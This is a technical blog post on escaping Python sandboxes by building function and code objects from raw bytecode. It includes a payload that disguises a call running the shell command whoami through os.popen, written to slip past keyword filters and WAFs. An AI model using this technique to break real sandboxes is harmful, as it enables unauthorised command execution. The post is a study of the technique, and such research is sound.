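This article is intended solely for technical exchange, study, and research. Using the techniques described here for illegal or destructive purposes is strictly prohibited.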

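Preface

JavaScript can create a function from a string through the Function constructor. When eval is filtered, creating a function from a string is one way around the filter: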

atob.constructor('console.log(1);')();

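I have recently been studying Python sandbox escapes and learned that Python, like JS, can create functions through a constructor. This article records some interesting tricks with __new__ in Python that I picked up along the way. My knowledge is limited, so corrections are very welcome.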

python object

The analysis below uses Python 3.12.6; details differ slightly between versions.

Download the source: https://github.com/python/cpython/

First, a quick review of Python objects.

Every object in Python is built by extending the PyObject struct. type feels similar to Class in Java: it defines the basic information about an object. Reference: https://flaggo.github.io/python3-source-code-analysis/objects/object/

type(obj) returns an object's type. The __new__ method of a type is used to create objects. For details see MetaClass: https://liaoxuefeng.com/books/python/oop-adv/meta-class/

__new__ eventually calls a PyXXXObject_New-style API, which creates the object.
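As a small illustration of the two points above (type(obj) returns the type, and the type's __new__ creates the instance), here is a minimal sketch. The class Point and the attribute created_by_new are made up for this example and do not come from CPython.

```python
class Point:
    """Hypothetical class, used only to show when __new__ runs."""

    def __new__(cls, x, y):
        # __new__ allocates the instance; __init__ only sees it afterwards.
        instance = super().__new__(cls)
        instance.created_by_new = True
        return instance

    def __init__(self, x, y):
        self.x = x
        self.y = y


p = Point(1, 2)
print(type(p))       # the class object Point
print(type(Point))   # classes are themselves instances of type

# Calling __new__ directly allocates an object without running __init__.
raw = Point.__new__(Point, 0, 0)
print(hasattr(raw, "x"))
```

The last line shows that an object produced by __new__ alone has been allocated but not initialised, which is why __new__ is the interesting hook when the goal is simply to bring an object of a given type into existence.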

PyFunctionObject

__new__ for PyFunctionObject is defined in cpython/Objects/funcobject.c, with the following comment:

/*[clinic input]
@classmethod
function.__new__ as func_new
    code: object(type="PyCodeObject *", subclass_of="&PyCode_Type")
        a code object
    globals: object(subclass_of="&PyDict_Type")
        the globals dictionary
    name: object = None
        a string that overrides the name from the code object
    argdefs as defaults: object = None
        a tuple that specifies the default argument values
    closure: object = None
        a tuple that supplies the bindings for free variables

Create a function object.
[clinic start generated code]*/

This shows that PyFunctionObject takes a PyCodeObject, which holds the executable Python code.

The __code__ attribute of a PyFunctionObject stores the PyCodeObject:

static PyGetSetDef func_getsetlist[] = {
    {"__code__", (getter)func_get_code, (setter)func_set_code},
    {"__defaults__", (getter)func_get_defaults,
     (setter)func_set_defaults},
    {"__kwdefaults__", (getter)func_get_kwdefaults,
     (setter)func_set_kwdefaults},
    {"__annotations__", (getter)func_get_annotations,
     (setter)func_set_annotations},
    {"__dict__", PyObject_GenericGetDict, PyObject_GenericSetDict},
    {"__name__", (getter)func_get_name, (setter)func_set_name},
    {"__qualname__", (getter)func_get_qualname, (setter)func_set_qualname},
    {"__type_params__", (getter)func_get_type_params,
     (setter)func_set_type_params},
    {NULL} /* Sentinel */
};

The getter func_get_code returns a PyCodeObject.
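The parameters listed in the clinic comment (code, globals, name, argdefs, closure) and the __code__ getter/setter pair can be exercised from pure Python. The following is a minimal sketch; greet, shout, and greet_clone are hypothetical names chosen for illustration.

```python
def greet(name, punctuation):
    return "hello " + name + punctuation


def shout(name, punctuation):
    return name.upper() + punctuation


function_type = type(greet)

# function(code, globals, name=None, argdefs=None, closure=None)
clone = function_type(
    greet.__code__,      # code: the code object to execute
    greet.__globals__,   # globals: the globals dictionary
    "greet_clone",       # name: overrides the name from the code object
    ("!",),              # argdefs: defaults for the trailing parameters
)

print(clone.__name__)
first_result = clone("world")
print(first_result)

# The __code__ setter swaps the body while keeping name and defaults.
clone.__code__ = shout.__code__
second_result = clone("world")
print(second_result)
```

The setter only accepts a code object with the same number of free variables as the one it replaces, which is why both helper functions here are plain, closure-free functions.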

PyCodeObject

Bytecode syntax and the parameters of __new__ differ between Python versions, so do not mix them. Not every version's form is listed here.

version >= 3.11

The accepted parameters are documented in cpython/Objects/codeobject.c. The comment on __new__ reads:

/*[clinic input]
@classmethod
code.__new__ as code_new

    argcount: int
    posonlyargcount: int
    kwonlyargcount: int
    nlocals: int
    stacksize: int
    flags: int
    codestring as code: object(subclass_of="&PyBytes_Type")
    constants as consts: object(subclass_of="&PyTuple_Type")
    names: object(subclass_of="&PyTuple_Type")
    varnames: object(subclass_of="&PyTuple_Type")
    filename: unicode
    name: unicode
    qualname: unicode
    firstlineno: int
    linetable: object(subclass_of="&PyBytes_Type")
    exceptiontable: object(subclass_of="&PyBytes_Type")
    freevars: object(subclass_of="&PyTuple_Type", c_default="NULL") = ()
    cellvars: object(subclass_of="&PyTuple_Type", c_default="NULL") = ()
    /

Create a code object.  Not for the faint of heart.
[clinic start generated code]*/

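The Python code itself is passed as a PyBytes_Type value, and the function name, variable names, and so on are all controllable, which leaves a great deal of freedom.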
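Because the positional signature changes between releases, one version-tolerant alternative (not the approach used in this article) is code.replace(), available since Python 3.8, which copies an existing code object with selected fields swapped. A minimal sketch, where template and the string values are hypothetical:

```python
def template():
    return "original"


co = template.__code__

# Swap one constant and the name; the bytecode itself is left untouched.
new_consts = tuple("patched" if c == "original" else c for c in co.co_consts)
patched_code = co.replace(co_consts=new_consts, co_name="patched")

# This body performs no global lookups, so an empty globals dict is enough.
patched = type(template)(patched_code, {})

print(template())
print(patched())
print(patched.__name__)
```

This avoids hard-coding the sixteen-plus positional arguments, at the cost of needing an existing code object to start from.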

version <= 3.9

The accepted parameters are documented in the docstring.

PyDoc_STRVAR(code_doc,
"code(argcount, posonlyargcount, kwonlyargcount, nlocals, stacksize,\n\
      flags, codestring, constants, names, varnames, filename, name,\n\
      firstlineno, lnotab[, freevars[, cellvars]])\n\
\n\
Create a code object.  Not for the faint of heart.");

Argument types:

/* Check argument types */
if (argcount < posonlyargcount || posonlyargcount < 0 ||
    kwonlyargcount < 0 || nlocals < 0 ||
    stacksize < 0 || flags < 0 ||
    code == NULL || !PyBytes_Check(code) ||
    consts == NULL || !PyTuple_Check(consts) ||
    names == NULL || !PyTuple_Check(names) ||
    varnames == NULL || !PyTuple_Check(varnames) ||
    freevars == NULL || !PyTuple_Check(freevars) ||
    cellvars == NULL || !PyTuple_Check(cellvars) ||
    name == NULL || !PyUnicode_Check(name) ||
    filename == NULL || !PyUnicode_Check(filename) ||
    lnotab == NULL || !PyBytes_Check(lnotab)) {
    PyErr_BadInternalCall();
    return NULL;
}

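Note that on <= 3.9, any global names the code uses must be supplied by hand through the __globals__ dict. On >= 3.10, a globals dict that has no "__builtins__" key makes the new function inherit the current builtins, so names such as print resolve without being passed in. (This is explained further below.)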
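The globals behaviour described above can be checked with a short experiment. This is a sketch under the assumption that the only global name the code needs is a builtin; probe and the result variables are hypothetical names.

```python
import sys


def probe():
    return len("abc")


function_type = type(probe)

# 1. Supplying the name explicitly works on every version.
explicit = function_type(probe.__code__, {"len": len})
explicit_result = explicit()

# 2. A "__builtins__" key in globals is honoured, so an empty one hides len.
isolated = function_type(probe.__code__, {"__builtins__": {}})
try:
    isolated_result = isolated()
except NameError:
    isolated_result = "NameError"

# 3. Empty globals: Python 3.10+ inherits the current builtins,
#    older versions fail to resolve the name.
bare = function_type(probe.__code__, {})
try:
    bare_result = bare()
except NameError:
    bare_result = "NameError"

print(sys.version_info[:2], explicit_result, isolated_result, bare_result)
```

Case 2 is also the reason a sandbox that controls the "__builtins__" entry of the globals dict can still restrict a function built this way.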

Constructing a function

The bytecode in the code below was generated by Python 3.12.6.

Inspect the values of the __code__ attributes in a debugger.

def test_func():
    print(1)

Most of the attributes in __code__ do not need to be changed.
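If no debugger is at hand, the same values can be dumped with getattr. The sketch below assumes only the co_* attribute names that CPython exposes; the three attributes in optional_fields exist only on newer versions, so they are guarded with hasattr.

```python
def test_func():
    print(1)


co = test_func.__code__

fields = [
    "co_argcount", "co_posonlyargcount", "co_kwonlyargcount", "co_nlocals",
    "co_stacksize", "co_flags", "co_code", "co_consts", "co_names",
    "co_varnames", "co_filename", "co_name", "co_firstlineno",
    "co_freevars", "co_cellvars",
]
# Present only on newer versions (co_linetable: 3.10+, the others: 3.11+).
optional_fields = ["co_qualname", "co_linetable", "co_exceptiontable"]

snapshot = {
    name: getattr(co, name)
    for name in fields + optional_fields
    if hasattr(co, name)
}

for name, value in snapshot.items():
    print(f"{name:20} {value!r}")
```

The printed values map one-to-one onto the constructor arguments, which makes it easy to see which ones (typically code, consts, and names) are worth changing.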

from types import CodeType, FunctionType

argcount = 0
posonlyargcount = 0
kwonlyargcount = 0
nlocals = 0
stacksize = 5
flags = 3
code = b'\x97\x00t\x01\x00\x00\x00\x00\x00\x00\x00\x00d\x01\xab\x01\x00\x00\x00\x00\x00\x00\x01\x00y\x00'
consts = (None, 1)
names = ('print', )
varnames = ()
filename = ''
name = ''
qualname = ''
firstlineno = 1
linetable = b''
exceptiontable = b''

f = FunctionType(CodeType(
    argcount,
    posonlyargcount,
    kwonlyargcount,
    nlocals,
    stacksize,
    flags,
    code,
    consts,
    names,
    varnames,
    filename,
    name,
    qualname,
    firstlineno,
    linetable,
    exceptiontable
), {})

f()
# print(1)

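The braces {} passed to the FunctionType constructor are the function's runtime __globals__ dict. On >= 3.10, a dict without a "__builtins__" key inherits the current builtins, so print resolves. On <= 3.9 the name has to be passed by hand, for example {"print": print}.

Simplified: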

from types import CodeType, FunctionType

code = b'\x97\x00t\x01\x00\x00\x00\x00\x00\x00\x00\x00d\x01\xab\x01\x00\x00\x00\x00\x00\x00\x01\x00y\x00'
f = FunctionType(CodeType(0, 0, 0, 0, 5, 3, code, (None, 1), ('print', ), (), '', '', '', 1, b'', b''), {})

f()
# print(1)

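Python bytecode is represented as bytes, and the related names (such as print) are plain strings, so it is easy to evade various checks through encoding, with an effect similar to eval.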
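To make the encoding point concrete, here is a minimal sketch in which the called name never appears literally in the source. It uses code.replace() rather than the positional constructor so that it is not tied to one Python version; template and placeholder are hypothetical names, and the harmless builtin len stands in for whatever name a filter would look for.

```python
import base64
import builtins


def template():
    # "placeholder" is never defined; it only reserves a slot in co_names.
    return placeholder("abc")


co = template.__code__

# "bGVu" is the base64 encoding of the three bytes b"len".
hidden_name = base64.b64decode("bGVu").decode()

patched_code = co.replace(co_names=(hidden_name,))
f = type(template)(patched_code, {"__builtins__": builtins})

result = f()
print(result)
```

A filter that scans the source text for the target name sees only the base64 string; the real name exists only at run time inside the names tuple.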

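Obtaining the types without import

CodeType and FunctionType are not keywords, and they are not in __builtins__ either. Besides importing them from the types module, they can be obtained through type(), which is a built-in in __builtins__.

FunctionType can be obtained from any function: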

func_type = type(lambda: None)

CodeType takes more work. Searching the source for every place that references PyCodeObject turns up the following usable routes:

PyFrameObject.f_code

// cpython/Objects/frameobject.c#L869
static PyGetSetDef frame_getsetlist[] = {
    {"f_back",          (getter)frame_getback, NULL, NULL},
    {"f_locals",        (getter)frame_getlocals, NULL, NULL},
    {"f_lineno",        (getter)frame_getlineno,
                    (setter)frame_setlineno, NULL},
    {"f_trace",         (getter)frame_gettrace, (setter)frame_settrace, NULL},
    {"f_lasti",         (getter)frame_getlasti, NULL, NULL},
    {"f_globals",       (getter)frame_getglobals, NULL, NULL},
    {"f_builtins",      (getter)frame_getbuiltins, NULL, NULL},
    {"f_code",          (getter)frame_getcode, NULL, NULL},
    {"f_trace_opcodes", (getter)frame_gettrace_opcodes, (setter)frame_settrace_opcodes, NULL},
    {0}
};

// cpython/Objects/frameobject.c#L1479
PyCodeObject *
PyFrame_GetCode(PyFrameObject *frame)
{
    assert(frame != NULL);
    assert(!_PyFrame_IsIncomplete(frame->f_frame));
    PyCodeObject *code = frame->f_frame->f_code;
    assert(code != NULL);
    return (PyCodeObject*)Py_NewRef(code);
}

The getter for a frame object's f_code attribute returns a PyCodeObject.

Usage:

def gen():
    yield 0

g = gen()

print(type(g.gi_frame.f_code))
# <class 'code'>

PyFunctionObject.__code__

// cpython/Objects/funcobject.c#L695
static PyGetSetDef func_getsetlist[] = {
    {"__code__", (getter)func_get_code, (setter)func_set_code},
    {"__defaults__", (getter)func_get_defaults,
     (setter)func_set_defaults},
    {"__kwdefaults__", (getter)func_get_kwdefaults,
     (setter)func_set_kwdefaults},
    {"__annotations__", (getter)func_get_annotations,
     (setter)func_set_annotations},
    {"__dict__", PyObject_GenericGetDict, PyObject_GenericSetDict},
    {"__name__", (getter)func_get_name, (setter)func_set_name},
    {"__qualname__", (getter)func_get_qualname, (setter)func_set_qualname},
    {"__type_params__", (getter)func_get_type_params,
     (setter)func_set_type_params},
    {NULL} /* Sentinel */
};

// cpython/Objects/funcobject.c#L462
static PyObject *
func_get_code(PyFunctionObject *op, void *Py_UNUSED(ignored))
{
    if (PySys_Audit("object.__getattr__", "Os", op, "__code__") < 0) {
        return NULL;
    }

    return Py_NewRef(op->func_code);
}

The getter for a function object's __code__ attribute returns a PyCodeObject.

Usage:

def test():
    pass

print(type(test.__code__))
# <class 'code'>

PyGenObject.gi_code

// cpython/Objects/genobject.c#L774
static PyObject *
gen_getcode(PyGenObject *gen, void *Py_UNUSED(ignored))
{
    return _gen_getcode(gen, "gi_code");
}

static PyGetSetDef gen_getsetlist[] = {
    {"__name__", (getter)gen_get_name, (setter)gen_set_name,
     PyDoc_STR("name of the generator")},
    {"__qualname__", (getter)gen_get_qualname, (setter)gen_set_qualname,
     PyDoc_STR("qualified name of the generator")},
    {"gi_yieldfrom", (getter)gen_getyieldfrom, NULL,
     PyDoc_STR("object being iterated by yield from, or None")},
    {"gi_running", (getter)gen_getrunning, NULL, NULL},
    {"gi_frame", (getter)gen_getframe,  NULL, NULL},
    {"gi_suspended", (getter)gen_getsuspended,  NULL, NULL},
    {"gi_code", (getter)gen_getcode,  NULL, NULL},
    {NULL} /* Sentinel */
};

A generator's gi_code attribute returns the code object.

def gen():
    yield 1

g = gen()

print(type(g.gi_code))
# <class 'code'>

PyCoroObject.cr_code

// cpython/Objects/genobject.c#L1120
static PyObject *
cr_getcode(PyCoroObject *coro, void *Py_UNUSED(ignored))
{
    return _gen_getcode((PyGenObject *)coro, "cr_code");
}

static PyGetSetDef coro_getsetlist[] = {
    {"__name__", (getter)gen_get_name, (setter)gen_set_name,
     PyDoc_STR("name of the coroutine")},
    {"__qualname__", (getter)gen_get_qualname, (setter)gen_set_qualname,
     PyDoc_STR("qualified name of the coroutine")},
    {"cr_await", (getter)coro_get_cr_await, NULL,
     PyDoc_STR("object being awaited on, or None")},
    {"cr_running", (getter)cr_getrunning, NULL, NULL},
    {"cr_frame", (getter)cr_getframe, NULL, NULL},
    {"cr_code", (getter)cr_getcode, NULL, NULL},
    {"cr_suspended", (getter)cr_getsuspended, NULL, NULL},
    {NULL} /* Sentinel */
};

The cr_code attribute of a coroutine:

async def asy():
    pass

a = asy()

print(type(a.cr_code))
# <class 'code'>

PyAsyncGenObject.ag_code

// cpython/Objects/genobject.c#L1527
static PyObject *
ag_getcode(PyGenObject *gen, void *Py_UNUSED(ignored))
{
    return _gen_getcode(gen, "ag_code");
}

static PyGetSetDef async_gen_getsetlist[] = {
    {"__name__", (getter)gen_get_name, (setter)gen_set_name,
     PyDoc_STR("name of the async generator")},
    {"__qualname__", (getter)gen_get_qualname, (setter)gen_set_qualname,
     PyDoc_STR("qualified name of the async generator")},
    {"ag_await", (getter)coro_get_cr_await, NULL,
     PyDoc_STR("object being awaited on, or None")},
     {"ag_frame",  (getter)ag_getframe, NULL, NULL},
     {"ag_code",  (getter)ag_getcode, NULL, NULL},
     {"ag_suspended",  (getter)ag_getsuspended, NULL, NULL},
    {NULL} /* Sentinel */
};

The ag_code attribute of an async generator:

async def asy_gen():
    yield 0

ag = asy_gen()

print(type(ag.ag_code))
# <class 'code'>

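The methods above only cover attributes whose type is PyCodeObject. Counting the dict of mapping objects and other modules, there may be more. Pure static analysis of the code probably will not turn up other routes easily (at least I could not find any). Dynamic debugging might be worth a try, but that is beyond what I know.

All of these methods use underscores, which seem likely to be banned, but I have not found a call chain that avoids underscores.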
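The five routes can be compared side by side. The sketch below imports types only to verify the result; the helper names plain, gen, coro, and agen are hypothetical.

```python
import types


def plain():
    pass


def gen():
    yield 0


async def coro():
    pass


async def agen():
    yield 0


g, c, ag = gen(), coro(), agen()

routes = {
    "function.__code__": type(plain.__code__),
    "frame.f_code": type(g.gi_frame.f_code),
    "generator.gi_code": type(g.gi_code),
    "coroutine.cr_code": type(c.cr_code),
    "async_generator.ag_code": type(ag.ag_code),
}

# Close the unfinished objects so no "never awaited" warning is emitted.
g.close()
c.close()

for route, found_type in routes.items():
    print(f"{route:26} {found_type is types.CodeType}")
```

Every route yields the same class object, so whichever attribute survives a filter is enough to recover the code type.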

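About bytecode

The bytecode shown earlier contains no specific variable names or keywords. Python bytecode generally consists only of stack operations; all names and constants are stored in names and consts.

Take the following code as an example:

The bytecode below was generated by Python 3.12.6.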

def test():
    print(1)

bytecode = test.__code__.co_code
print(bytecode)

# b'\x97\x00t\x01\x00\x00\x00\x00\x00\x00\x00\x00d\x01\xab\x01\x00\x00\x00\x00\x00\x00\x01\x00y\x00'

Disassembled with dis, the bytecode looks like this:

0 RESUME                    0
2 LOAD_GLOBAL               1
12 LOAD_CONST               1
14 CALL                     1
22 POP_TOP
24 RETURN_CONST             0

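Flow:

  1. LOAD_GLOBAL 1: the low bit of the operand requests that a NULL be pushed first, and the remaining bits (1 >> 1 = 0) select names[0], which is 'print'. The name 'print' is looked up in the function's __globals__ and then in its builtins, and <built-in function print> is pushed. (This is where the 3.9 versus 3.10 difference mentioned earlier comes in.)
  2. LOAD_CONST 1: pushes consts[1], the value 1, onto the stack.
  3. CALL 1: calls the function on the stack with one argument, i.e. print(1).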
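The listing and the steps above can be reproduced with the standard dis module. This sketch uses dis.get_instructions, which resolves each operand to the name or constant it refers to; the exact opcodes printed depend on the Python version in use.

```python
import dis


def test():
    print(1)


# Print offset, opcode name, raw operand, and the resolved operand value.
for ins in dis.get_instructions(test):
    print(ins.offset, ins.opname, ins.arg, repr(ins.argval))

# Collect the global loads to see which name the bytecode refers to.
global_loads = [
    (ins.opname, ins.argval)
    for ins in dis.get_instructions(test)
    if ins.opname == "LOAD_GLOBAL"
]
print(global_loads)
```

The argval column shows that the string 'print' comes from co_names rather than from the bytecode bytes, which only carry the index.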

So with the same bytecode, changing the name and constant tables changes what actually gets executed:

def test():
    return func1(0).func2(1).func3()

code = test.__code__.co_code

func_type = type(lambda: None)
code_type = type((lambda: None).__code__)

f = func_type(code_type(0, 0, 0, 0, 5, 3, code, (None, 'os', 'whoami'), ('__import__', 'popen', 'read'), (), '', '', '', 1, b'', b''), {})

print(f())

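Because of Python's dynamic nature, the code content is not strictly checked when a function is created. The test function calls func1(0).func2(1).func3(), but after consts and names are replaced, what actually runs is __import__('os').popen('whoami').read().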
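The same table-swapping idea can be written without version-specific constructor arguments by using code.replace(). The sketch below is a harmless variant: the mapping tables and the target calls (str, join, upper) are made up for illustration, and string constants are used so that the constants are stored in co_consts on every version.

```python
def template():
    return func1("a").func2("b").func3()


co = template.__code__

# Hypothetical substitution tables: placeholder -> real name / constant.
name_map = {"func1": "str", "func2": "join", "func3": "upper"}
const_map = {"a": "-", "b": "xyz"}

patched_code = co.replace(
    co_names=tuple(name_map.get(name, name) for name in co.co_names),
    co_consts=tuple(
        const_map.get(const, const) if isinstance(const, str) else const
        for const in co.co_consts
    ),
)

# The bytecode is identical; only the lookup tables differ.
f = type(template)(patched_code, {"str": str})
result = f()
print(result)
```

After the swap the function evaluates str("-").join("xyz").upper(), even though the bytes in co_code are exactly those compiled for the placeholder call chain.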

Result

The code below runs on Python 3.12.6.

async def test():
    pass

functype = type(test)
codetype = type(test().cr_code)
code = b'\x97\x00t\x01\x00\x00\x00\x00\x00\x00\x00\x00d\x01\xab\x01\x00\x00\x00\x00\x00\x00\x01\x00y\x00'

f = functype(codetype(0, 0, 0, 0, 5, 3, code, (None, 5), ('p''r''i''n''t', ), (), '', '', '', 1, b'', b''), {})

f()
# print(5)

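This can be used to bypass WAFs and similar filters.

Beyond that, being able to write and execute bytecode directly means lower-level APIs become reachable, and a memory error can be triggered directly to kill the process.

That said, sandbox environments usually do not provide type(), _ is very likely to be filtered, and the code.__new__ audit event can hook the creation of code objects. So the technique seems fairly limited 😅, but I feel there should be more interesting tricks. My coding fundamentals are weak, so I will stop here.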
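On the defensive side, the audit events mentioned above can be observed with sys.addaudithook. The sketch below records the code.__new__ and function.__new__ events and optionally refuses code object creation; the names seen, state, and hook are hypothetical, and a hook installed this way stays active for the rest of the process.

```python
import sys

seen = []
state = {"deny": False}


def hook(event, args):
    # Only react to the two events relevant here; ignore everything else.
    if event in ("code.__new__", "function.__new__"):
        seen.append(event)
        if state["deny"] and event == "code.__new__":
            raise RuntimeError("code object creation blocked")


sys.addaudithook(hook)


def template():
    return 1


# Both code.replace() and the function constructor raise audit events.
code_copy = template.__code__.replace(co_name="copy")
rebuilt = type(template)(code_copy, {})
print(seen)

# With the deny flag set, the hook's exception reaches the caller.
state["deny"] = True
try:
    template.__code__.replace(co_name="blocked")
    blocked = False
except RuntimeError:
    blocked = True
finally:
    state["deny"] = False
print(blocked)
```

Ordinary def statements and compile() do not raise code.__new__, so a hook like this mainly catches hand-built or copied code objects, which is exactly the pattern this article relies on.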

References

https://flaggo.github.io/python3-source-code-analysis/objects/object/

https://jbnrz.com.cn/index.php/2024/08/15/pyjail/

https://book.hacktricks.xyz/generic-methodologies-and-resources/python/bypass-python-sandboxes#creating-the-code-object

https://liaoxuefeng.com/books/python/oop-adv/meta-class/